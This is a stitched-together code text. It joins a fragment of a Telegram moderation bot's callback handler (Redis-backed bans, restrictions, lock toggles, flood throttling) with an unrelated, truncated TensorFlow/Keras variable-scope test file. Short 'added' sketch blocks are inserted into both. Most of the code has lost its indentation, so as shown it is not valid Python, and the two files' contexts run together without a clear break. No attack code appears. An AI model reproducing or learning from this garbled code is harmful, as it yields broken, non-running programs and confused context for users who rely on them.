#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[1]))})
if date[0] == 'LU-res':
d = date[1].split("-")
lock = d[0]
lockres = d[0]+":"+d[1]
if redis.sismember("{}Nbot:{}".format(BOT_ID,lockres),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,lockres),chatID)
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,lockres),chatID)
redis.sadd("{}Nbot:{}".format(BOT_ID,lock),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[3]))})
if date[0] == 'LU':
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
save = redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
else:
save = redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
if int(date[3]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
if date[0] == "delListblockTEXTs":
redis.delete("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListbans":
arrays = redis.smembers("{}Nbot:{}:bans".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":user})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListrestricteds":
arrays = redis.smembers("{}Nbot:{}:restricteds".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": user,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "LandU":
if date[3] == "LtoU":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[3] == "UtoL":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Corder":
if date[1] == "bans":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("kickChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[1] == "restricteds":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 0,"can_send_media_messages": 0,"can_send_other_messages": 0,"can_send_polls": 0,"can_change_info": 0,"can_add_web_page_previews": 0,"can_pin_messages": 0,})
redis.sadd("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delList":
H = date[1]
if H != "sudos" and H != "creator" and H != "asudos":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "sudos" or H == "asudo":
redis.delete("{}Nbot:{}".format(BOT_ID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "creator":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id})
elif int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
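# --- Added illustration (not part of the original handler above) ---
# The callback handler throttles button presses per user with a short-lived
# Redis counter (see the `redis.setex(...floodClick...)` calls above). Below is
# a minimal standalone sketch of that pattern, assuming a redis-py style
# client; the helper name and the `limit`/`ttl` defaults are illustrative only.
def too_many_clicks(redis, bot_id, user_id, limit=5, ttl=3):
    # The key expires after `ttl` seconds, so the per-user counter resets
    # automatically once the user stops clicking.
    key = "{}Nbot:{}:floodClick".format(bot_id, user_id)
    clicks = int(redis.get(key) or 0)
    redis.setex(key, ttl, clicks + 1)
    return clicks + 1 > limit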
|
variable_scope_shim_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
import gc
import threading
from absl.testing import parameterized
import numpy
from tensorflow.python.framework import test_util
from keras import combinations
from keras import regularizers
from keras.engine import input_layer as input_layer_module
from keras.engine import training as training_module
from keras.layers import core
from keras.legacy_tf_layers import core as core_layers
from keras.legacy_tf_layers import variable_scope_shim
from tensorflow.python.ops import variable_scope
def run_inside_wrap_function_in_eager_mode(graph_function):
"""Decorator to execute the same graph code in eager and graph modes.
  The decorated function body is executed with a fresh
  `variable_scope_shim._EagerVariableStore` installed via
  `variable_scope.with_variable_store`, so `get_variable` calls are tracked by
  that store in both graph and eager execution.
Args:
graph_function: python function containing graph code to be wrapped
Returns:
decorated function
"""
def wrap_and_execute(self):
store = variable_scope_shim._EagerVariableStore()
with variable_scope.with_variable_store(store):
# use the original function
graph_function(self)
return wrap_and_execute
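# --- Added usage sketch (not part of the original test file) ---
# The decorator above is meant to be stacked under
# `test_util.run_in_graph_and_eager_modes`, exactly as the tests below do.
# The class and method names here are illustrative; the method deliberately
# avoids the `test` prefix so it is never collected or executed by the runner.
class _DecoratorUsageSketch(tf.test.TestCase):

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def example_variables_go_through_shim_store(self):
    # Inside the decorated body, `get_variable` is served by the fresh
    # `_EagerVariableStore` installed by the decorator.
    with tf.compat.v1.variable_scope("sketch_scope"):
      v = tf.compat.v1.get_variable("v", [1])
    self.assertEqual(v.name, "sketch_scope/v:0")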
class VariableScopeTest(tf.test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEqual(0, len(gc.garbage))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertIs(v, v1)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNameExists(self):
vs = variable_scope._get_default_variable_store()
# No check by default, so we can both create and get existing names.
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertIs(v, v1)
self.assertIsNot(v, vs.get_variable("u", [1], reuse=False))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set(v.name for v in vs._vars.values()))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Expected tf.group() expected Tensor arguments not 'None' with
# type '<type 'NoneType'>'
@test_util.run_in_graph_and_eager_modes
def testVarScopeInitializer(self):
init = tf.compat.v1.constant_initializer(0.3)
with tf.compat.v1.variable_scope("tower0") as tower:
with tf.compat.v1.variable_scope("foo", initializer=init):
v = tf.compat.v1.get_variable("v", [])
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
with tf.compat.v1.variable_scope(tower, initializer=init):
w = tf.compat.v1.get_variable("w", [])
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with tf.compat.v1.variable_scope("tower1") as tower:
with tf.compat.v1.variable_scope("foo", constraint=constraint):
v = tf.compat.v1.get_variable("v", [])
self.assertIsNotNone(v.constraint)
with tf.compat.v1.variable_scope(tower, constraint=constraint):
w = tf.compat.v1.get_variable("w", [])
self.assertIsNotNone(w.constraint)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeDType(self):
with tf.compat.v1.variable_scope("tower2") as tower:
with tf.compat.v1.variable_scope("foo", dtype=tf.float16):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, tf.float16)
with tf.compat.v1.variable_scope(tower, dtype=tf.float16):
w = tf.compat.v1.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, tf.float16)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitFromNonTensorValue(self):
v = tf.compat.v1.get_variable("v4", initializer=4, dtype=tf.int32)
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 4)
w = tf.compat.v1.get_variable(
"w4", initializer=numpy.array([1, 2, 3]), dtype=tf.int64)
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
# A quirk to be revisited?
error = ValueError if tf.executing_eagerly() else TypeError
with self.assertRaises(error):
tf.compat.v1.get_variable("x4", initializer={})
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitFromNonInitializer(self):
    # Test various dtypes with a zeros initializer, as follows:
types = [
tf.int8, tf.uint8, tf.int16, tf.uint16, tf.int32,
tf.int64, tf.bool
]
    # Use a different variable name for each dtype to keep them distinct.
for (i, dtype) in enumerate(types):
x = tf.compat.v1.get_variable(
name="xx%d" % i, shape=(3, 4), dtype=dtype)
y = tf.compat.v1.get_variable(
name="yy%d" % i,
shape=(3, 4),
dtype=dtype,
initializer=tf.compat.v1.zeros_initializer(dtype=dtype))
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeRegularizer(self):
init = tf.compat.v1.constant_initializer(0.3)
def regularizer1(v):
return tf.reduce_mean(v) + 0.1
def regularizer2(v):
return tf.reduce_mean(v) + 0.2
with tf.compat.v1.variable_scope(
"tower3", regularizer=regularizer1) as tower:
with tf.compat.v1.variable_scope("foo", initializer=init):
v = tf.compat.v1.get_variable("v", [])
self.evaluate(tf.compat.v1.variables_initializer([v]))
with tf.compat.v1.variable_scope(tower, initializer=init) as vs:
tf.compat.v1.get_variable("u", [])
vs.set_regularizer(regularizer2)
tf.compat.v1.get_variable("w", [])
      # The next 3 variables are not regularized, to test disabling regularization.
tf.compat.v1.get_variable(
"x", [], regularizer=tf.compat.v1.no_regularizer)
with tf.compat.v1.variable_scope(
"baz", regularizer=tf.compat.v1.no_regularizer):
tf.compat.v1.get_variable("y", [])
vs.set_regularizer(tf.compat.v1.no_regularizer)
tf.compat.v1.get_variable("z", [])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitializeFromValue(self):
init = tf.constant(0.1)
w = tf.compat.v1.get_variable("v", initializer=init)
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.1)
with self.assertRaisesRegex(ValueError, "shape"):
# We disallow explicit shape specification when initializer is constant.
tf.compat.v1.get_variable("u", [1], initializer=init)
with tf.compat.v1.variable_scope("foo", initializer=init):
# Constant initializer can be passed through scopes if needed.
v = tf.compat.v1.get_variable("v")
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.1)
# Check that non-float32 initializer creates a non-float32 variable.
init = tf.constant(1, dtype=tf.int32)
t = tf.compat.v1.get_variable("t", initializer=init)
self.assertEqual(t.dtype.base_dtype, tf.int32)
# Raise error if `initializer` dtype and `dtype` are not identical.
with self.assertRaisesRegex(ValueError, "don't match"):
tf.compat.v1.get_variable("s", initializer=init, dtype=tf.float64)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuse(self):
with self.cached_session():
def test_value(value):
x = tf.constant(value)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=tf.compat.v1.AUTO_REUSE):
_ = tf.compat.v1.assign(tf.compat.v1.get_variable("var", []), x)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=tf.compat.v1.AUTO_REUSE):
_ = tf.compat.v1.get_variable("var", [])
self.assertEqual(value, self.evaluate(x))
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuseIgnoreFalse(self):
with self.cached_session():
def test_value(value):
x = tf.constant(value)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=False):
_ = tf.compat.v1.assign(tf.compat.v1.get_variable("var", []), x)
# We need to ignore reuse=False in the shim, because the
# code is expected to get rerun each time the user calls the shim.
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=False):
_ = tf.compat.v1.get_variable("var", [])
self.assertEqual(value, self.evaluate(x))
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScope(self):
with self.cached_session():
with tf.name_scope("testVarOpScope1"):
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "tower/w:0")
with tf.name_scope("testVarOpScope2"):
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default_1/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
with self.cached_session():
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1_1/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1_2/layer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesWithJump(self):
with self.cached_session():
with tf.compat.v1.variable_scope("default") as default:
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/layer/w:0")
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"default/layer_1/w:0")
with tf.compat.v1.variable_scope(default):
pass
# No matter the jump in the middle, unique numbering continues.
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"default/layer_2/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuse(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True) as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetVar(self):
with self.cached_session():
with tf.compat.v1.variable_scope("root"):
with tf.compat.v1.variable_scope("towerA") as tower_a:
va = tf.compat.v1.get_variable("v", [1])
self.assertEqual(va.name, "root/towerA/v:0")
with tf.compat.v1.variable_scope(tower_a, reuse=True):
va2 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va2, va)
with tf.compat.v1.variable_scope("towerB"):
vb = tf.compat.v1.get_variable("v", [1])
self.assertEqual(vb.name, "root/towerB/v:0")
with tf.compat.v1.variable_scope("towerA", reuse=True):
va2 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va2, va)
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
self.assertEqual(v.name, "root/foo/bar/v:0")
with tf.compat.v1.variable_scope(tower_a, reuse=True):
va3 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va, va3)
with self.assertRaises(ValueError) as exc:
with tf.compat.v1.variable_scope(tower_a, reuse=True):
tf.compat.v1.get_variable("v", [2]) # Different shape.
self.assertEqual("shape" in str(exc.exception), True)
with self.assertRaises(ValueError) as exc:
with tf.compat.v1.variable_scope(tower_a, reuse=True):
tf.compat.v1.get_variable("v", [1], dtype=tf.int32)
self.assertEqual("dtype" in str(exc.exception), True)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
pass
with tf.compat.v1.variable_scope(outer):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestedOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope(outer):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseParam(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer) as outer:
with tf.compat.v1.variable_scope("tower", "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
outer.reuse_variables()
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseError(self):
with self.cached_session():
with self.assertRaises(ValueError):
with tf.compat.v1.variable_scope(None, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
pass
with tf.compat.v1.variable_scope(outer, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
outer.reuse_variables()
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeNestedOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope(outer, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with tf.compat.v1.variable_scope(
"scope", auxiliary_name_scope=False) as scope:
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "scope/w:0")
with tf.compat.v1.variable_scope(scope, auxiliary_name_scope=False):
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name, "scope/w1:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
"inner", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/inner/w:0")
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as inner1:
self.assertEqual(inner1.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name, "outer/inner/w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with tf.compat.v1.variable_scope(
None, default_name="default", auxiliary_name_scope=False):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/w:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
None, default_name="default",
auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
root_scope = tf.compat.v1.get_variable_scope()
with tf.compat.v1.variable_scope(
root_scope, auxiliary_name_scope=False):
self.assertEqual(tf.compat.v1.get_variable("w", []).name, "w:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
root_scope, auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "")
self.assertEqual(tf.compat.v1.get_variable("w1", []).name, "w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAuxiliaryNameScopeIsInvalid(self):
with self.cached_session():
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
None, default_name="scope", auxiliary_name_scope="invalid"):
pass
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
"scope", auxiliary_name_scope="invalid"):
pass
with tf.compat.v1.variable_scope("scope") as scope:
pass
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
scope, auxiliary_name_scope="invalid"):
pass
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReuseScopeWithoutNameScopeCollision(self):
# Github issue: #13429
with self.cached_session():
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope("inner") as inner:
pass
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as scope:
with tf.name_scope(scope.original_name_scope):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/inner/w:0")
with tf.compat.v1.variable_scope("another"):
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as scope1:
with tf.name_scope(scope1.original_name_scope):
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name,
"outer/inner/w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVarWithDevice(self):
g = tf.Graph()
varname_type = []
def device_func(op):
if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
varname_type.append((op.name, op.get_attr("dtype")))
return "/device:GPU:0"
with g.as_default():
with tf.compat.v1.device(device_func):
_ = tf.compat.v1.get_variable("x", (100, 200))
